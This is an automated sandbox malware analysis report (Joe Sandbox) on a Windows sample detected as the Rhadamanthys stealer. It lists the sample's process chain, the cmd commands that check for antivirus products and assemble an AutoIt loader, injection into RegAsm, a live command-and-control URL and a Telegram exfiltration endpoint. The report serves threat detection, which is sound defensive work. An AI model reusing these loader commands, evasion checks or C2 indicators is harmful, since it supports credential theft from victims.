                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001C11B3 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,_cexit,exit,4_2_001C11B3
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001C1170 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_initterm,GetStartupInfoA,_initterm,4_2_001C1170
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: 17.2.RegAsm.exe.2a9626c.2.raw.unpack, Flutter.csReference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
                  Source: 17.2.RegAsm.exe.2a9626c.2.raw.unpack, Flutter.csReference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
                  Source: 17.2.RegAsm.exe.2a9626c.2.raw.unpack, Flutter.csReference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comMemory written: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe base: 700000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comMemory written: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe base: 700000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comMemory written: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe base: 429000Jump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeProcess created: C:\Users\user\AppData\Local\Temp\setup.exe "C:\Users\user\AppData\Local\Temp\setup.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeProcess created: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe "C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Me Me.cmd & Me.cmdJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 422648Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Total + ..\Jones + ..\Handed + ..\Norwegian + ..\Beef + ..\Cu + ..\Biology + ..\Busy + ..\Bahamas + ..\Invoice + ..\Practices + ..\Atm + ..\Particularly + ..\Ongoing + ..\Lane + ..\False + ..\Huge BJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\422648\Ai.com Ai.com BJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comProcess created: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comProcess created: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                  Source: RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Ai.com, 0000000D.00000000.1389897007.00000000006B3000.00000002.00000001.01000000.0000000F.sdmp, Motion.3.dr, Ai.com.5.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00210FA3 cpuid 4_2_00210FA3
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeQueries volume information: C:\Users\user\AppData\Local\Temp\setup.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeQueries volume information: C:\Users\user\Desktop\BJZFPPWAPT.png VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeQueries volume information: C:\Users\user\Desktop\BNAGMGSPLO.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeQueries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeQueries volume information: C:\Users\user\Desktop\DUUDTUBZFW.mp3 VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeQueries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeQueries volume information: C:\Users\user\Desktop\PWCCAWLGRE.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.docx VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeQueries volume information: C:\Users\user\Desktop\SUAVTZKNFL.xlsx VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeCode function: 0_2_005FCD05 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_005FCD05
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,3_2_00406805
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OllyDbg.exe
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: regmon.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 00000012.00000003.1702400594.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1707925431.0000000004E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.1713875821.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 00000012.00000003.1702400594.00000000029F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1707925431.0000000004E60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000012.00000002.1713875821.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  51
                  Input Capture
                  1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  12
                  Encrypted Channel
                  Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts11
                  Native API
                  Boot or Logon Initialization Scripts1
                  Access Token Manipulation
                  1
                  Deobfuscate/Decode Files or Information
                  LSASS Memory1
                  Peripheral Device Discovery
                  Remote Desktop Protocol51
                  Input Capture
                  1
                  Non-Application Layer Protocol
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Command and Scripting Interpreter
                  Logon Script (Windows)212
                  Process Injection
                  3
                  Obfuscated Files or Information
                  Security Account Manager3
                  File and Directory Discovery
                  SMB/Windows Admin Shares3
                  Clipboard Data
                  12
                  Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading
                  NTDS146
                  System Information Discovery
                  Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script121
                  Masquerading
                  LSA Secrets531
                  Security Software Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
                  Virtualization/Sandbox Evasion
                  Cached Domain Credentials3
                  Process Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation
                  DCSync41
                  Virtualization/Sandbox Evasion
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
                  Process Injection
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Network Configuration Discovery
                  Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1571370 Sample: PQwHxAiBGt.exe Startdate: 09/12/2024 Architecture: WINDOWS Score: 100 66 ipapi.co 2->66 68 edMKDlxnNIzWufljfi.edMKDlxnNIzWufljfi 2->68 70 bitbucket.org 2->70 80 Found malware configuration 2->80 82 Multi AV Scanner detection for submitted file 2->82 84 Yara detected RHADAMANTHYS Stealer 2->84 86 6 other signatures 2->86 11 PQwHxAiBGt.exe 23 2->11         started        signatures3 process4 dnsIp5 72 ipapi.co 104.26.8.44, 443, 49706 CLOUDFLARENETUS United States 11->72 74 bitbucket.org 185.166.143.50, 443, 49704 AMAZON-02US Germany 11->74 58 C:\Users\user\AppData\Local\Temp\setup.exe, PE32 11->58 dropped 60 C:\Users\user\...\RobertsonDeclined.exe, PE32 11->60 dropped 102 Writes many files with high entropy 11->102 16 RobertsonDeclined.exe 29 11->16         started        20 setup.exe 2 11->20         started        file6 signatures7 process8 file9 46 C:\Users\user\AppData\Local\Temp\Total, data 16->46 dropped 48 C:\Users\user\AppData\Local\Temp\Practices, data 16->48 dropped 50 C:\Users\user\AppData\Local\...\Particularly, data 16->50 dropped 54 15 other files (14 malicious) 16->54 dropped 76 Multi AV Scanner detection for dropped file 16->76 78 Writes many files with high entropy 16->78 22 cmd.exe 3 16->22         started        52 C:\Users\user\AppData\Local\...\setup.tmp, PE32 20->52 dropped 26 setup.tmp 9 13 20->26         started        signatures10 process11 file12 56 C:\Users\user\AppData\Local\Temp\...\Ai.com, PE32 22->56 dropped 88 Drops PE files with a suspicious file extension 22->88 90 Writes many files with high entropy 22->90 28 Ai.com 1 22->28         started        32 cmd.exe 2 22->32         started        34 conhost.exe 22->34         started        36 6 other processes 22->36 92 Contains functionality to detect sleep reduction / modifications 26->92 signatures13 process14 file15 62 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 28->62 dropped 104 Writes to foreign memory regions 28->104 106 Injects a PE file into a foreign processes 28->106 38 RegAsm.exe 1 1 28->38         started        40 RegAsm.exe 28->40         started        64 C:\Users\user\AppData\Local\Temp\422648\B, data 32->64 dropped signatures16 process17 signatures18 43 svchost.exe 38->43         started        94 Switches to a custom stack to bypass stack traces 40->94 process19 signatures20 96 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 43->96 98 Checks if the current machine is a virtual machine (disk enumeration) 43->98 100 Switches to a custom stack to bypass stack traces 43->100

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  PQwHxAiBGt.exe53%ReversingLabsWin32.Trojan.Generic
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\422648\Ai.com0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Motion0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exe71%ReversingLabsWin32.Trojan.Generic
                  C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmp0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\setup.exe5%ReversingLabs
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  https://154.216.17.46:3673/d3b272a7b40f3260049/pfcws03c.cmivsx0%Avira URL Cloudsafe
                  https://154.216.17.46:3673/d3b272a7b40f3260049/pfcws03c.cmivs0%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bitbucket.org
                  185.166.143.50
                  truefalse
                    high
                    ipapi.co
                    104.26.8.44
                    truefalse
                      high
                      edMKDlxnNIzWufljfi.edMKDlxnNIzWufljfi
                      unknown
                      unknownfalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://154.216.17.46:3673/d3b272a7b40f3260049/pfcws03c.cmivstrue
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://154.216.17.46:3673/d3b272a7b40f3260049/pfcws03c.cmivsxsvchost.exe, 00000012.00000002.1713419509.000000000083C000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://gcc.gnu.org/bugs/):setup.tmp.2.drfalse
                          high
                          https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupUPQwHxAiBGt.exe, setup.exe.0.drfalse
                            high
                            http://www.autoitscript.com/autoit3/XRobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Ai.com, 0000000D.00000000.1389988787.00000000006C5000.00000002.00000001.01000000.0000000F.sdmp, Motion.3.dr, Ai.com.5.drfalse
                              high
                              https://api.telegram.org/bot/sendMessage?chat_id=&text=&parse_mode=MarkdownPQwHxAiBGt.exefalse
                                high
                                http://nsis.sf.net/NSIS_ErrorErrorRobertsonDeclined.exe, 00000003.00000000.1325882952.0000000000408000.00000002.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000002.1352015228.0000000000408000.00000002.00000001.01000000.00000006.sdmp, PQwHxAiBGt.exe, RobertsonDeclined.exe.0.drfalse
                                  high
                                  https://www.autoitscript.com/autoit3/RobertsonDeclined.exe, 00000003.00000002.1352037422.000000000041F000.00000004.00000001.01000000.00000006.sdmp, RobertsonDeclined.exe, 00000003.00000003.1329900146.00000000028B0000.00000004.00000020.00020000.00000000.sdmp, Motion.3.dr, Ai.com.5.drfalse
                                    high
                                    https://ipapi.co/json/country_codecountry_namePQwHxAiBGt.exefalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.26.8.44
                                      ipapi.coUnited States
                                      13335CLOUDFLARENETUSfalse
                                      185.166.143.50
                                      bitbucket.orgGermany
                                      16509AMAZON-02USfalse
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1571370
                                      Start date and time:2024-12-09 10:33:14 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 23s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:21
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:PQwHxAiBGt.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:61151df093ebef01768789ead98ed2ed73ef951162414101b25a9db8129491a3.exe
                                      Detection:MAL
                                      Classification:mal100.rans.troj.spyw.evad.winEXE@33/28@3/2
                                      EGA Information:
                                      • Successful, ratio: 80%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Stop behavior analysis, all processes terminated
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target svchost.exe, PID 8060 because there are no executed function
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • VT rate limit hit for: PQwHxAiBGt.exe
                                      TimeTypeDescription
                                      04:34:16API Interceptor1x Sleep call for process: RobertsonDeclined.exe modified
                                      04:34:21API Interceptor1x Sleep call for process: Ai.com modified
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      104.26.8.44https://buiseenet-fbsp247.getresponsewebsite.com/Get hashmaliciousUnknownBrowse
                                        https://application-submit.com/form/redbullGet hashmaliciousUnknownBrowse
                                          https://3r9e6kkr.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.ca%2Furl%3Fq=30NUMBER%26rct=77772474802481024856%26sa=t%26url=amp%2Fs%2Festudioit.cl%2Fstarl%2F%2523Y2FybGEuYWxkZW1pcjFAbWxjaW5zdXJhbmNlLmNvbS5hdQ==/1/0100019346ba248e-096005ca-8ea9-493d-b2f5-e0c34fd69fc0-000000/JH6rhkavYmTGSs9Zspd-vAN7bi8=401Get hashmaliciousUnknownBrowse
                                            http://wwwfucai13.ccGet hashmaliciousUnknownBrowse
                                              https://app.scalenut.com/creator/991c897c-dcc2-43e6-ba55-339c0f6812c2/kj8jd9r9doGet hashmaliciousUnknownBrowse
                                                https://www.google.ca/url?q=30NUMBER&rct=77151727248916238810&sa=t&url=amp/s/estudioit.cl/starl/%23YW5nZWxhLmhvZGdzb25AMnNmZy5jb20=Get hashmaliciousUnknownBrowse
                                                  bPRQRIfbbq.exeGet hashmaliciousUnknownBrowse
                                                    AD6dpKQm7n.exeGet hashmaliciousUnknownBrowse
                                                      NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                        63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                          185.166.143.50jW3NEKvxH1.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                            yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                              yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                lnvoice-1620804301.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                  ft.exeGet hashmaliciousLummaC StealerBrowse
                                                                    invoice-1664809283.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                      https://getgreenshot.orgGet hashmaliciousUnknownBrowse
                                                                        qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                          3o2WdGwcLF.vbsGet hashmaliciousUnknownBrowse
                                                                            0a0#U00a0.jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              ipapi.cohttps://www.google.ca/url?q=1120091333775300779273902563687390256368&rct=11200913337753007792&sa=t&url=amp/s/elanpro.net/horeca/dispenc#YnJ1bml0YS5kdW5jYW5AcGFydG5lcnNtZ3UuY29tGet hashmaliciousHTMLPhisherBrowse
                                                                              • 104.26.9.44
                                                                              https://buiseenet-fbsp247.getresponsewebsite.com/Get hashmaliciousUnknownBrowse
                                                                              • 104.26.8.44
                                                                              Employee_Bonus_Notlce.pdfGet hashmaliciousUnknownBrowse
                                                                              • 172.67.69.226
                                                                              https://application-workspace.com/red-bull/id-38772Get hashmaliciousUnknownBrowse
                                                                              • 104.26.9.44
                                                                              https://application-submit.com/form/redbullGet hashmaliciousUnknownBrowse
                                                                              • 104.26.8.44
                                                                              https://application-submit.com/form/redbullGet hashmaliciousUnknownBrowse
                                                                              • 104.26.9.44
                                                                              https://avidgroup.famislnc.com/fvcvfxfec/cc6d843dfd/?1f9da=amtsZW1wQGNhcmlzbHMuY29tGet hashmaliciousUnknownBrowse
                                                                              • 172.67.69.226
                                                                              https://www.google.co.ls/amp/s/2mzptv.s3.us-east-1.amazonaws.com/qr.htmlGet hashmaliciousUnknownBrowse
                                                                              • 172.67.69.226
                                                                              https://3r9e6kkr.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.ca%2Furl%3Fq=30NUMBER%26rct=77772474802481024856%26sa=t%26url=amp%2Fs%2Festudioit.cl%2Fstarl%2F%2523Y2FybGEuYWxkZW1pcjFAbWxjaW5zdXJhbmNlLmNvbS5hdQ==/1/0100019346ba248e-096005ca-8ea9-493d-b2f5-e0c34fd69fc0-000000/JH6rhkavYmTGSs9Zspd-vAN7bi8=401Get hashmaliciousUnknownBrowse
                                                                              • 104.26.8.44
                                                                              BOA-everbridge.com-$29,890.htmlGet hashmaliciousUnknownBrowse
                                                                              • 104.21.94.136
                                                                              bitbucket.orgYWFMFVCSun.batGet hashmaliciousAsyncRAT, DcRatBrowse
                                                                              • 185.166.143.48
                                                                              jW3NEKvxH1.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                              • 185.166.143.50
                                                                              yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                              • 185.166.143.50
                                                                              yG53aU3gGm.exeGet hashmaliciousUnknownBrowse
                                                                              • 185.166.143.50
                                                                              lnvoice-1620804301.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                              • 185.166.143.48
                                                                              lnvoice-1620804301.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                              • 185.166.143.50
                                                                              ft.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 185.166.143.50
                                                                              https://bitbucket.org/ziphose/obmen/downloads/Doc.7zGet hashmaliciousRMSRemoteAdminBrowse
                                                                              • 185.166.143.49
                                                                              invoice-6483728493.pdf .jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                              • 185.166.143.49
                                                                              invoice-1664809283.pdf (1).jsGet hashmaliciousRHADAMANTHYSBrowse
                                                                              • 185.166.143.50
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUS1mr7lpFIVI.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.26.12.205
                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                              • 172.67.165.166
                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                              • 104.21.16.9
                                                                              http://www.sbh.co.uk/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                              • 104.21.58.83
                                                                              http://www.pixelpromo.ru/bitrix/redirect.php?event1=click_to_call&event2=&event3=&goto=https://oR.smelsgycz.ru/OP4lIHE/#Dinfo@test.uk.comGet hashmaliciousUnknownBrowse
                                                                              • 104.17.25.14
                                                                              DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                                              • 172.67.220.36
                                                                              Play.VN-_E_CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                              • 172.67.192.56
                                                                              jKDBppzWTb.exeGet hashmaliciousAgentTeslaBrowse
                                                                              • 172.67.74.152
                                                                              MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                                              • 104.21.38.113
                                                                              enyi.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                              • 104.26.13.205
                                                                              AMAZON-02USPayment Advice - Advice RefA2dGOv46MCnu -USD Priority payment.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.248.169.48
                                                                              MN1qo2qaJmEvXDP.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.248.169.48
                                                                              RFQ _ Virtue 054451000085.exeGet hashmaliciousFormBookBrowse
                                                                              • 18.141.10.107
                                                                              boatnet.arm.elfGet hashmaliciousMiraiBrowse
                                                                              • 54.171.230.55
                                                                              boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                              • 54.171.230.55
                                                                              boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                              • 54.171.230.55
                                                                              cllmxIZWcQ.lnkGet hashmaliciousUnknownBrowse
                                                                              • 3.5.167.250
                                                                              qhjKN40R2Q.lnkGet hashmaliciousUnknownBrowse
                                                                              • 52.95.134.150
                                                                              NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                              • 13.248.169.48
                                                                              jew.arm5.elfGet hashmaliciousMiraiBrowse
                                                                              • 54.171.230.55
                                                                              No context
                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              C:\Users\user\AppData\Local\Temp\422648\Ai.comfile.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                  SeT_up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                      6duXSAApsY.exeGet hashmaliciousUnknownBrowse
                                                                                        6duXSAApsY.exeGet hashmaliciousUnknownBrowse
                                                                                          mod01_pdf.lnkGet hashmaliciousUnknownBrowse
                                                                                            file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                              mQC9xlWFZV.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                mQC9xlWFZV.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                  Process:C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe
                                                                                                  File Type:CSV text
                                                                                                  Category:dropped
                                                                                                  Size (bytes):226
                                                                                                  Entropy (8bit):5.360398796477698
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                  MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                  SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                  SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                  SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                  Malicious:false
                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                  Category:dropped
                                                                                                  Size (bytes):947288
                                                                                                  Entropy (8bit):6.630612696399572
                                                                                                  Encrypted:false
